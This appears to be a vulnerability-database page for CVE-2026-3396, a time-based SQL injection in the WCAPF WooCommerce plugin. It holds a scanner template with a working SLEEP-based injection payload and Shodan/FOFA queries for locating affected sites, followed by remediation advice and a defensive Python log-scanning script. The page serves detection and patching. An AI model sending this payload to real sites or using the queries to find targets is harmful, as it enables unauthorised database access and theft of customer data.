WCAPF WooCommerce Ajax Product Filter - SQL Injection

CVE-2026-3396
Verified

Description

WCAPF WooCommerce Ajax Product Filter <= 4.2.3 contains a time-based SQL injection caused by insufficient escaping of the 'post-author' parameter, letting unauthenticated attackers extract sensitive database information remotely.

Severity

High

CVSS Score

7.5

Exploit Probability

23%

Published Date

April 14, 2026

Template Author

theamanrawat

CVE-2026-3396.yaml
id: CVE-2026-3396

info:
  name: WCAPF WooCommerce Ajax Product Filter - SQL Injection
  author: theamanrawat
  severity: high
  description: |
    WCAPF WooCommerce Ajax Product Filter <= 4.2.3 contains a time-based SQL injection caused by insufficient escaping of the 'post-author' parameter, letting unauthenticated attackers extract sensitive database information remotely.
  impact: |
    Unauthenticated attackers can extract sensitive database information, potentially compromising data confidentiality.
  remediation: |
    Update to a version later than 4.2.3 or the latest available version.
  reference:
    - https://patchstack.com/database/vulnerability/wordpress-wcapf-woocommerce-ajax-product-filter-plugin-4-2-3-unauthenticated-time-based-sql-injection-vulnerability
    - https://nvd.nist.gov/vuln/detail/CVE-2026-3396
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2026-3396
    epss-score: 0.22856
    epss-percentile: 0.95968
    cwe-id: CWE-89
  metadata:
    verified: true
    max-request: 2
    shodan-query: 'http.html:"/wp-content/plugins/wc-ajax-product-filter/"'
    fofa-query: 'body="/wp-content/plugins/wc-ajax-product-filter/"'
  tags: sqli,wp-plugin,wc-ajax-product-filter,woocommerce,wordpress

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/wc-ajax-product-filter/readme.txt"

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
        internal: true

      - type: word
        words:
          - "WCAPF"
          - "WooCommerce Ajax Product Filter"
        condition: and
        internal: true

  - method: GET
    path:
      - "{{BaseURL}}/shop/?filter_post_author=1%27%20AND%20SLEEP(6)%20AND%20%271%27%3D%271"

    matchers:
      - type: dsl
        dsl:
          - 'duration>=6'
          - 'contains(body, "No results found")'
          - 'status_code == 200'
        condition: and
# digest: 490a004630440220348bb98c28b254d5d371ae8b2d6eb29c69913058cac832fecf84db5c88e4846c0220275ab2124a8ca00fde9e9ee08fab9ce6c755b249527728202e18a67384563738:922c64590222798bb761d5b6d8e72950

CVSS Metrics

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
CVE ID: CVE-2026-3396
CWE ID: CWE-89

References

https://patchstack.com/database/vulnerability/wordpress-wcapf-woocommerce-ajax-product-filter-plugin-4-2-3-unauthenticated-time-based-sql-injection-vulnerability
https://nvd.nist.gov/vuln/detail/CVE-2026-3396

Remediation Steps

Update to a version later than 4.2.3 or the latest available version.
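
Until the update is applied, access logs can be checked for the request pattern the template sends. The following is an added example, not part of the original template or the plugin: it scans access-log lines for the `filter_post_author` query parameter and flags values that are not plain numeric IDs. The combined log format, the assumption that legitimate values are comma-separated numeric author IDs, the function names and the sample log lines are all assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Parameter name taken from the template's second request.
PARAM = "filter_post_author"
# Assumption: legitimate values are numeric author IDs, optionally comma-separated.
SAFE_VALUE = re.compile(r"\d+(,\d+)*")
# Client IP, request target and status from a combined-log-format line (assumed format).
REQUEST = re.compile(
    r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)


def suspicious_values(target):
    """Return decoded filter_post_author values that are not numeric IDs."""
    query = urlsplit(target).query
    # parse_qsl percent-decodes, so %27 and %20 are compared as ' and space.
    return [v for k, v in parse_qsl(query)
            if k == PARAM and not SAFE_VALUE.fullmatch(v)]


def scan(lines):
    """Return (client_ip, status, value) for each flagged request."""
    hits = []
    for line in lines:
        m = REQUEST.match(line)
        if not m:
            continue  # not a request line in the assumed format
        for value in suspicious_values(m.group("target")):
            hits.append((m.group("ip"), int(m.group("status")), value))
    return hits


# Constructed sample log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [14/Apr/2026:10:00:01 +0000] "GET /shop/?filter_post_author=3 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [14/Apr/2026:10:00:05 +0000] "GET /shop/?filter_post_author=1%27%20AND%20SLEEP(6)%20AND%20%271%27%3D%271 HTTP/1.1" 200 4096',
    '192.0.2.11 - - [14/Apr/2026:10:00:09 +0000] "GET /shop/?orderby=price HTTP/1.1" 200 6000',
]

if __name__ == "__main__":
    for ip, status, value in scan(SAMPLE_LOG):
        print(f"{ip} status={status} {PARAM}={value!r}")
```

A hit shows that a non-numeric value was sent, not that the site was vulnerable when it arrived; compare the request times against the date the plugin was updated.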